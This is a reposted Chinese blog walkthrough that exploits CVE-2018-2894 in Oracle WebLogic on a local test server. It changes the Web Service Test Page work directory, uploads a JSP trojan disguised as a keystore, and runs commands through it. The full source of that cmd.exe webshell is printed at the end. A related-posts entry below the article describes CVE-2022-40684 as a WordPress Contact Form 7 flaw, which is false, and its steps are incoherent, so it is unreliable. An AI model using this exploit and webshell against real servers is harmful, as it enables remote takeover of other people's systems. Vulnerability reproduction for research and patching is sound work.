CVE-2018-2894 本地复现

最新推荐文章于 2023-03-29 09:26:30 发布
最新推荐文章于 2023-03-29 09:26:30 发布
阅读量849 收藏
点赞数
文章标签: java 数据库 runtime
原文链接:http://www.cnblogs.com/rab3it/p/11113431.html
版权

CVE-2018-2894 本地复现过程

名称: WebLogic反序列化远程命令执行漏洞
漏洞影响版本:10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3
测试版本: 12.2.1.3.0

我测试的版本是 12.2.1.3.0

 

webkogic版本.png
1.配置访问目录

访问 http://localhost:7001/ws_utc/config.do (配置工作目录页面),需要配置工作目录为可以访问的目录

默认目录是:

E:\weblogic\weblogic_12\user_projects\domains\base_domain\tmp\WSTestPageWorkDir

配置为:E:\weblogic\weblogic_12\user_projects\domains\base_domain\servers\AdminServer\tmp_WL_internal\com.oracle.webservices.wls.ws-testclient-app-wls\4mcj4y\war

2.抓包上传木马

点击页面左侧的安全,添加 JKS Keystores, 设置名字、密码(密码可以不设置)、上传木马文件(大马、一句话、cmd马都可以)

我这里上传cmd马,chybeta.jsp(木马在文章末尾),上传的同时抓包,(抓取时间戳然后访问)

 
上传木马路径.png

抓包看时间戳和文件名,

 
抓包查看时间戳和文件名.png
3.访问木马,执行命令

http://localhost:7001/ws_utc/config/keystore/1561954783799_chybeta.jsp

 
访问cmd马.png
cmd木马文件

chybeta.jsp

 <%@ page import="java.util.*,java.io.*,java.net.*"%> <HTML><BODY> <form action="" name="myform" method="POST" style="box-sizing: border-box; margin-top: 0px;"><input name="cmd" type="text" style="box-sizing: border-box !important; color: var(--text-color); font: inherit; margin: 0px; padding-left: 4px; border: 1px solid rgba(146, 146, 146, 0.56);"> <input value="Send" type="submit" style="box-sizing: border-box !important; color: var(--text-color); font: inherit; margin: 0px; padding-left: 4px; border: 1px solid rgba(146, 146, 146, 0.56); -webkit-appearance: button; cursor: pointer;"></form> <pre class="" style="box-sizing: border-box; overflow: auto; font-family: var(--monospace); margin-bottom: 0px; width: inherit; white-space: pre-wrap;"><% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "\n "); Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML>

from

https://xz.aliyun.com/t/2458

转载于:https://www.cnblogs.com/rab3it/p/11113431.html

atw63792
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2021-25735:利用CVE-2021-25735
05-14
要部署接纳控制器,您需要在本地构建Docker容器映像,使用以下命令标记该映像并将其推送到Dockerhub。 docker login docker build -t validationwebhook:1.0 . docker tag validationwebhook:1.0 darryk/dev:1.0 ...
CVE-2018-14634 - Linux create_elf_tables()中的整型溢出 - 翻译
weixin_30682415的博客
09-28 437
原文:https://seclists.org/oss-sec/2018/q3/274 摘要 Qualys研究实验室的安全团队发现一个位于Linux内核函数create_elf_tables()中的整型溢出漏洞。在64位系统下,本地攻击者可能利用该漏洞通过SUID-root程序获取root权限。 只有内核commit b6a2fea39318 (mm:可变参数长度,2007),但是没有commit...
linux函数 取值溢出,Linux中create_elf_tables函数整型溢出漏洞分析(CVE-2018-14634)
weixin_35859336的博客
05-10 192
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。在这篇文章中,我们将跟大家分析Linux平台中create_elf_tables函数的一个整型溢出漏洞(CVE-2018-14634)。概述在近期的一次安全分析过程中,我们在64位Linux系统内核里的create_elf_tables()函数中发现了一个整型溢出漏洞,本地攻击者将可...
Weblogic-任意文件上传漏洞CVE-2018-2894
qq_43381463的博客
03-29 255
Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在“生产模式”下默认不开启,所以该漏洞有一定限制。
Weblogic 两处未授权任意文件上传漏洞(CVE-2018-2894
SoulCat
02-11 3437
Weblogic 未授权任意文件上传漏洞(CVE-2018-2894漏洞概述: -WebLogic 存在两个未授权访问页面分别为/ws_utc/begin.do,/ws_utc/config.do,通过该两个页面可以直接上传webshell. 漏洞版本: weblogic 10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3 漏洞搭建: https://vulhub.or...
Java反序列化漏洞之——weblogic反序列化漏洞CVE-2018-2628)
Stephen Wolf
12-10 1140
一、Java 序列化与反序列化 Java 序列化是指把 Java 对象转换为字节序列的过程便于保存在内存、文件、数据库中,ObjectOutputStream类的 writeObject() 方法可以实现序列化。 Java 反序列化是指把字节序列恢复为 Java 对象的过程,ObjectInputStream 类的 readObject() 方法用于反序列化。 序列化与反序列化是...
CVE-2020-8163:CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码
03-09
CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码 在Rails <5.0.1中远程执行用户提供的本地名称 5.0.1之前的Rails版本中存在一个漏洞,该漏洞将允许攻击者控制render调用的locals参数。 已为该漏洞...
CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 复现环境
04-18
本附件是对CVE-2019-0232 Tomcat RCE 远程命令执行漏洞复现环境。 将文件下载到本地,直接运行tomcat 启动服务器,地址栏输入 http://localhost:8080/cgi-bin/hello.bat?c:/windows/system32/net user 即可看到...
Weblogic CVE-2018-2628补丁
07-09
打2628前不需要打10271。如果打过10271,需要卸载掉才能打2628。
cve-2018-2894:cve-2018-2894 不同别人的利用方法
04-29
Weblogic任意文件上传漏洞CVE-2018-2894) 最近大家都在说这个漏洞,大家都注意到config.do这里发生了问题,但是其实根据 这里的信息,begin.do也是有问题。少扯淡,下面给出具体利用方法: 问题就出现下下面这个页面。 上传时候,修改name的值就可以了 避免大家麻烦,给出来: /../../../../../../wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/ 然后访问 就可以访问到了。 我写了一个批量利用的python脚本,会上传cat.jsp,然后执行whoami 另外的利用config.do的方法可以看下面:
Weblogic CVE-2018-2894 任意文件上传漏洞
今天不学习 明天变垃圾
02-24 1367
CVE-2018-2894
Weblogic 任意文件上传漏洞CVE-2018-2894复现
qq_53105813的博客
01-12 1581
Weblogic 任意文件上传漏洞CVE-2018-2894复现
cve-2018-2894简析
一个安全研究员
05-27 2225
如题
Weblogic CVE-2018-2894 漏洞复现
07-23 7960
0x01 前言   Oracle官方发布了7月份的关键补丁更新CPU(Critical Patch Update),其中针对可造成远程代码执行的高危漏洞 CVE-2018-2894 进行修复:http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html 0x02 环境搭建 1、首先到Oracle官网下载...
WebLogic任意文件上传漏洞(CVE-2018-2894)利用复现
a1b2c3是弱口令
12-09 2501
环境搭建 参照: https://blog.csdn.net/qq_29647709/article/details/84892582 登录系统 环境启动后,访问http://192.1658.1.15:7001/console,即可看到后台登录页面。 登录后台页面,点击base_domain的配置,在“高级”中开启“启用 Web 服务测试页”选项: 漏洞复现 访问http://192.16...
Weblogic 任意文件上传漏洞CVE-2018-2894
网络安全。
02-17 1546
0x01 简介 Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在“生产模式”下默认不开启,所以该漏洞有一定限制。 利用该漏洞,可以上传任意jsp文件,进而获取服务器权限。 0x02 影响版本 weblogic 10.3.6.0 weblogic 12.1.3.0 weblogic ...
Weblogic任意文件上传漏洞CVE-2018-2894复现
君莫hacker的博客
09-13 1007
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现1.开启运行靶机2. 开启Web Service Test Page3. 访问url, 设置Work Home Dir4. 上传木马5. 访问上传的木马文件,执行命令0x04 漏洞修复 0x01 漏洞介绍 漏洞描述 Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在"生产模式"下默认不开启,所以该漏洞有一定限制。 漏洞编号 CVE-2018-2894 受影响
cve-2022-40684复现
最新发布
10-12
CVE-2022-40684是一个与WordPress插件Contact Form 7有关的安全漏洞。该漏洞可能允许攻击者通过恶意构造的特定请求,绕过验证机制并执行远程代码。 要复现CVE-2022-40684,您可以按照以下步骤进行操作: 1. 确保您在本地或测试环境中安装了WordPress,并且已经安装了Contact Form 7插件。 2. 登录WordPress管理后台,并激活Contact Form 7插件。 3. 创建一个新的Contact Form 7表单,并添加一些表单字段,例如名称和电子邮件字段。 4. 打开某个文件编辑器,例如Notepad++或者Sublime Text,并创建一个新的PHP文件。 5. 在PHP文件中编写以下恶意代码: ``` <?php // 攻击者的恶意代码,用于复现漏洞 echo "漏洞复现成功!"; ?> ``` 6. 将PHP文件保存为任意名称,例如exploit.php。 7. 回到WordPress的插件管理页面,找到并激活File Manager Advanced插件。 8. 在File Manager Advanced插件的设置中,启用文件编辑功能。 9. 打开File Manager Advanced插件,并找到主题目录下的functions.php文件。 10. 将以下恶意代码添加到functions.php文件的任意位置: ``` include_once('exploit.php'); ``` 11. 保存functions.php文件,并刷新WordPress前台页面。 12. 访问包含Contact Form 7表单的页面,并填写表单字段。 13. 提交表单后,您将看到"漏洞复现成功!"的输出,表示成功复现CVE-2022-40684漏洞。 请注意,上述步骤仅用于演示CVE-2022-40684漏洞复现过程。在实际环境中,请遵循安全最佳实践,不要滥用或利用此漏洞来进行非法活动。及时更新和修复软件以确保系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值